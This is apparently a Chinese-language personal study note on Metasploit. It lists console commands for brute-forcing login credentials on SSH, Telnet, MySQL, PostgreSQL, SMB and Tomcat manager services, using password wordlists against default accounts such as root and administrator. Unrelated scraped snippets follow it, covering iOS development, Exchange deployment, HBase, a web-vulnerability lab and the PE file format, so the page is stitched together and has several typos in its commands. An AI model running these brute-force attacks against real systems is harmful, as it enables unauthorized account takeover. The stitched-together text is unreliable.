metasploit篇-03

口令密码爆破模块

爆破ssh服务口令的猜解

大多数都是linux下的

search ssh这个时候我们能看到很多

search ssh_login

找到一个字典

use auxiliary/scanner/ssh/ssh_login

show options

set RHOST ip地址

set PASS_FILE pass

set USERNAME root

exploit

下面其他的服务的操作给它是一样的,就不一一操作了。

爆破破解telnet

比较慢

search telnet_login

use auxiliary/scanner/telnet/telnet_login

show opiotns

set RHOST IP

set PASS_FILE pass

set USERNAME administrator

show options

exploit

爆破破解mysql数据库

search mysql_login

use auxiliary/scanner/mysql/mysql_login

show options

set RHOSTS ip

set PASS_FILE pass

set USERNAMR root

exploit

爆破数据库

search postfresql_login

use auxiliary/scanner/postgres/postgres_login

show  options

set RHOSTS ip

set PASS_FILE pass

set USERNAME postgres

exploit

爆破smbda攻击

use auxiliary/scanner/smb/smb_login

show options

下面的一样

爆破tomcat攻击

search tomacat

use auxiliary/scanner/http/tomcat_mgr_login

set RHOSTS IP

set PASS_FILE /root/pass.txt

set USER_FILE /root/user.txt

exploit

来自为知笔记(Wiz)

时间: 2025-01-14 04:40:09

metasploit篇-03的相关文章

iOS系列 基础篇 03 探究应用生命周期

iOS系列 基础篇 03 探究应用生命周期 目录: 1. 非运行状态 - 应用启动场景 2. 点击Home键 - 应用退出场景 3. 挂起重新运行场景 4. 内存清除 - 应用终止场景 5. 结尾 本篇主要探讨的是iOS应用中各种状态的跃迁过程,建议大家通过修改AppDelegate.swift,在每个过程中添加日志输出代码,从而观察其变化. 作为应用程序的委托对象,AppDelegate类在应用程序生命周期的不同阶段会回调不同的方法. 首先,咱们先来了解一下iOS应用的不同状态和他们之间的关系

iOS开发项目篇—03添加导航控制器

iOS开发项目篇—03添加导航控制器 一.简单说明 分析:分析微博应用,我们需要给每个子控制器都添加一个导航控制器(每个子控制器的导航不一样),所以需要新建一个导航控制器,然后把该导航控制器作为window的根控制器,添加的四个子控制器,分别添加在导航控制器上,也就是说整个项目采用当前主流的UI框架,一个UITabBarController管理着四个UINavigationController,而每个UINavigationController则分别管理着“首页”.“消息”.“发现”和“我”这四

Exchange 2016部署实施案例篇-03.Exchange部署篇(中)

上一章<Exchange 2016部署实施案例篇-03.Exchange部署篇(上)>我们对部署Exchange Server 2016的先决条件做了简单的讲解,接下来我们进入先决条件准备工作. 先简单说下环境: 服务器名称 IP地址 系统 作用 ADSrv01 192.168.1.10 Win2016 GC(已部署完成) ADSrv02 192.168.1.20 Win2016 GC(已部署完成) EXSrv01 192.168.1.50 Win2016 MailBox(未安装) EXSrv

“挖掘机”升级路 一篇(03)--HBase集群安装中的收获

粗略算算,从上周五到这周二,折腾Hadoop已经三天了.这三天我是过得诚惶诚恐,作为一个学徒,老大虽然没有说啥,但是我恨不得立马完成这些基本的部署工作,感觉拖了好久好久.简单的总结一下,第一天折腾Hadoop单机和伪分布式的安装,第二天在折腾Hive的安装,以失败告终,第三天折腾HBase的集群安装,在主节点上安装成功. 也就来具体的谈谈今天的收获,今天的参考资料主要是这么两篇1.分布式实时日志系统(四) 环境搭建之centos 6.4下hbase 1.0.1 分布式集群搭建(我FQ看的,不知道

metasploit篇-02

metasploit信息收集模块 刚开始的我们需要开启数据库 但是呢,有的时候出现,数据库没有链接 这个时候呢,我们只要输入一条命令就可以了 输入db_rebuild_cache命令即可 whois查询 查看网站的一些信息,,注册人,之策人的邮箱,注册地点 http://searchdbs.netcraft.com在线收集服务器ip地址信息工具收集dns的 nslookup也是可以得dns msf与postfresql协同工作 高级扫描 使用ip段,扫一个网段中存活的ip use/auxilia

metasploit篇-01

全称:metasploit Framework 分为metasploit Framework 有商业版本也有免费版本的 是由ruby语言写的,是开源的 windows和linux都有 一般我们用的都是控制台模式 攻击分类: exploit溢出 auxiliary模块 encoders编码 payload攻击载荷 溢出:分为主动溢出和被动溢出 metasploit的安装有很多方法,在这里就不多说了 metasploit基础 是一个漏洞框架,全称the metasploit framework 简称

WebBug靶场基础篇 — 03

基础篇 6 - 16 关... 在记录之前,先说一件事 = =! 小学生真多 = =!好心提供一个靶场,玩玩就算了,他挂黑页 ?现在好了,以后这个靶场不对外啊!你高兴了?爽了吧? 都是新手过来的,好心搭个公网的漏洞网站,还真有挂黑页的... 第六关... 这个关卡设置的有点问题,只有一个登陆框,也没给提示账号密码,弱密码也试了好几波,都没进去 = =!然后我就去数据库里看看密码 = =! 毕竟源码设计的还是有问题,然后我就开始登陆了. 看到这里,直接抓包,毕竟不就是一个修改参数的漏洞嘛... 是

iOS开发多线程篇 03 —线程安全

iOS开发多线程篇—线程安全 一.多线程的安全隐患 资源共享 1块资源可能会被多个线程共享,也就是多个线程可能会访问同一块资源 比如多个线程访问同一个对象.同一个变量.同一个文件 当多个线程访问同一块资源时,很容易引发数据错乱和数据安全问题 示例一: 示例二: 问题代码: 1 // 2 // YYViewController.m 3 // 05-线程安全 4 // 5 // Created by apple on 14-6-23. 6 // Copyright (c) 2014年 itcase.

PE格式详细讲解3 - 系统篇03

作者:小甲鱼 接着我们来谈谈 IMAGE_OPTIONAL_HEADER 结构,正如名字的意思,这是一个可选映像头,是一个可选的结构. 但是呢,实际上上节课我们讲解的 IMAGE_FILE_HEADER 结构远远不足以来定义 PE 文件的属性. 因此,这些属性在 IMAGE_OPTIONAL_HEADER 结构中进行定义. 因此这两个结构联合起来,才是一个完整的 “PE文件结构” . typedef struct _IMAGE_OPTIONAL_HEADER { // // Standard f